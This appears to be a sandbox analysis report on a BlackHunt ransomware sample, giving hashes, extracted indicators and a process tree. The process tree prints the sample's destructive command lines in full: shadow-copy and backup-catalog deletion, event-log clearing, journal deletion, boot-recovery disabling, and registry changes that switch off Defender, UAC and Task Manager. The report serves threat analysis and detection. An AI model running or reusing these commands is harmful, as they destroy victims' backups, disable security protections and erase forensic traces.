Analysis
- max time kernel: 4s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20231222-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 18/01/2024, 22:44
Static task: static1

Behavioral task: behavioral1
- Sample: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
- Resource: win7-20231215-en

Behavioral task: behavioral2
- Sample: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
- Resource: win10v2004-20231222-en
General
- Target: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
- Size: 707KB
- MD5: e6e042228afcc18239f234c4e9d44d55
- SHA1: bfec002de8e368ea515c656a9cc8c200f357b0eb
- SHA256: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5
- SHA512: 50447dbb92b15d5f332cbd4129b7dcadd0e04849f6bf1c75a94f19bf49f7903c9a2a98bb47e48c32f91bdd3dc8e5912689b11853fdb94e06d1a246b754663aa6
- SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T8xvnh:6uaTmkZJ+naie5OTamgEoKxLWSlh
Malware Config
Extracted
- C:\ProgramData\#BlackHunt_ReadMe.hta
- http-equiv="x-ua-compatible"
- http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
- 7744 fsutil.exe
- 5892 fsutil.exe

- Key created: \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)

- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
Clears Windows event logs (1 TTPs, 5 IoCs)
- 8232 wevtutil.exe
- 7552 wevtutil.exe
- 8012 wevtutil.exe
- 7684 wevtutil.exe
- 8680 wevtutil.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
- 8188 bcdedit.exe
- 6748 bcdedit.exe
- 3484 bcdedit.exe
- 5812 bcdedit.exe
Renames multiple (537) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

- 7024 wbadmin.exe
- 6428 wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)

Adds Run key to start application (2 TTPs, 1 IoCs)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)

- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 7: ip-api.com

Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)
- pid 11872, pid_target 12964, WerFault.exe, procid_target 262

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- 2880 schtasks.exe

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
- 7320 vssadmin.exe
- 1560 vssadmin.exe
- 8348 vssadmin.exe
- 2000 vssadmin.exe
- 7356 vssadmin.exe
- 7344 vssadmin.exe

Kills process with taskkill (1 IoCs)
- 7064 taskkill.exe

Modifies registry class (12 IoCs)
- Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2 (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2 (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ (reg.exe)

Runs ping.exe (1 TTPs, 1 IoCs)
- 6776 PING.EXE

Suspicious use of AdjustPrivilegeToken (10 IoCs)
- Token: SeDebugPrivilege (PID 1184, 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Token: SeRestorePrivilege (PID 1184, 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Token: SeBackupPrivilege (PID 1184, 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Token: SeTakeOwnershipPrivilege (PID 1184, 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Token: SeAuditPrivilege (PID 1184, 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Token: SeSecurityPrivilege (PID 1184, 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Token: SeIncBasePriorityPrivilege (PID 1184, 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Token: SeBackupPrivilege (PID 2932, vssvc.exe)
- Token: SeRestorePrivilege (PID 2932, vssvc.exe)
- Token: SeAuditPrivilege (PID 2932, vssvc.exe)
Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTPs, 3 IoCs)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
"C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1184
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  PID:5080

    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
    PID:4828

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
  - Suspicious use of WriteProcessMemory
  PID:2800

    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    PID:1180

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  - Suspicious use of WriteProcessMemory
  PID:4484

    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    - Modifies registry class
    PID:4532
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  - Suspicious use of WriteProcessMemory
  PID:2540

    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    PID:2404

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  PID:676

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
  PID:5024

    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    PID:3680

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  PID:3616

    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    PID:4444
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  PID:3680

    C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    - Interacts with shadow copies
    PID:7320

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  PID:3864

    C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit
    PID:6748

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  PID:3056

    C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    PID:5052

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  PID:4712

    C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    - Deletes backup catalog
    PID:7024

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  PID:1576

    C:\Windows\system32\fsutil.exe
    fsutil.exe usn deletejournal /D C:
    - Deletes NTFS Change Journal
    PID:7744
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  PID:3508

    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    PID:3648

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  PID:4836

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  PID:4232

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  PID:4752

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  PID:3140

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F
  PID:644

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  PID:1504

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  PID:4468

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  PID:2720

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  PID:3860

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
  PID:5080

    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Modifies registry class
    PID:4272
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  PID:2348

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  PID:3500

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  PID:3012

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  PID:2100

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  PID:1364

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  PID:4260

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  PID:2256

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  PID:228

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  PID:3508

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  - Suspicious use of WriteProcessMemory
  PID:1080

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  - Suspicious use of WriteProcessMemory
  PID:5064

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  - Suspicious use of WriteProcessMemory
  PID:4640

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
  PID:3048

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
  PID:324

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
  PID:4140

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
- Suspicious use of WriteProcessMemory
PID:4468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4448
-
-
  - C:\Windows\System32\cmd.exe (PID 16264): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
    - C:\Windows\system32\wevtutil.exe (PID 8232; signatures: Clears Windows event logs): wevtutil.exe cl Security
  - C:\Windows\System32\cmd.exe (PID 15156): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
    - C:\Windows\system32\wevtutil.exe (PID 8680; signatures: Clears Windows event logs): wevtutil.exe cl Security /e:false
  - C:\Windows\System32\cmd.exe (PID 6908): "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    - C:\Windows\system32\fsutil.exe (PID 5892; signatures: Deletes NTFS Change Journal): fsutil.exe usn deletejournal /D C:
  - C:\Windows\System32\cmd.exe (PID 5464): "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
    - C:\Windows\system32\notepad.exe (PID 6952): notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
  - C:\Windows\SysWOW64\cmd.exe (PID 6016): "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"
  - C:\Windows\System32\cmd.exe (PID 7160): "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
    - C:\Windows\SysWOW64\mshta.exe (PID 12964): "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      - C:\Windows\SysWOW64\WerFault.exe (PID 11872; signatures: Program crash): C:\Windows\SysWOW64\WerFault.exe -u -p 12964 -s 1464
  - C:\Windows\System32\cmd.exe (PID 880): "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
  - C:\Windows\System32\cmd.exe (PID 5944): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
  - C:\Windows\System32\cmd.exe (PID 5592): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
  - C:\Windows\System32\cmd.exe (PID 14024): "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
  - C:\Windows\System32\cmd.exe (PID 14476): "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
  - C:\Windows\System32\cmd.exe (PID 10168): "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
  - C:\Windows\System32\cmd.exe (PID 8660): "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  - C:\Windows\System32\cmd.exe (PID 8816): "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  - C:\Windows\System32\cmd.exe (PID 5324): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  - C:\Windows\System32\cmd.exe (PID 412): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  - C:\Windows\System32\cmd.exe (PID 16312): "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  - C:\Windows\System32\cmd.exe (PID 8132): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
  - C:\Windows\System32\cmd.exe (PID 14384): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
  - C:\Windows\System32\cmd.exe (PID 8608): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
  - C:\Windows\System32\cmd.exe (PID 9124): "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
  - C:\Windows\System32\cmd.exe (PID 7760): "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
  - C:\Windows\System32\cmd.exe (PID 7712): "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
- C:\Windows\system32\reg.exe (PID 1148; signatures: Adds Run key to start application): reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
- C:\Windows\system32\reg.exe (PID 4820; signatures: Modifies Windows Defender Real-time Protection settings): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 2020): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
- C:\Windows\system32\reg.exe (PID 2200): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 2852): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
- C:\Windows\system32\vssvc.exe (PID 2932; signatures: Suspicious use of AdjustPrivilegeToken): C:\Windows\system32\vssvc.exe
- C:\Windows\System32\Conhost.exe (PID 676; signatures: Suspicious use of WriteProcessMemory): \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - C:\Windows\system32\reg.exe (PID 4444): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
- C:\Windows\system32\vssadmin.exe (PID 2000; signatures: Enumerates connected drives, Interacts with shadow copies): vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
- C:\Windows\system32\bcdedit.exe (PID 8188; signatures: Modifies boot configuration data using bcdedit): bcdedit /set {default} recoveryenabled No
- C:\Windows\system32\vssadmin.exe (PID 7356; signatures: Interacts with shadow copies): vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
- C:\Windows\system32\vssadmin.exe (PID 7344; signatures: Interacts with shadow copies): vssadmin.exe Delete Shadows /all /quiet
- C:\Windows\system32\schtasks.exe (PID 2880; signatures: Creates scheduled task(s)): SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F
- C:\Windows\system32\vssadmin.exe (PID 1560; signatures: Interacts with shadow copies): vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
- C:\Windows\system32\reg.exe (PID 1736): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 5068): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 1724): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 2008): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
- C:\Windows\system32\wbengine.exe (PID 10808): "C:\Windows\system32\wbengine.exe"
- C:\Windows\system32\reg.exe (PID 2380): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 2908): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 1180; signatures: Modifies registry class): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
- C:\Windows\System32\vdsldr.exe (PID 6620): C:\Windows\System32\vdsldr.exe -Embedding
- C:\Windows\system32\reg.exe (PID 3812): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 3076): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
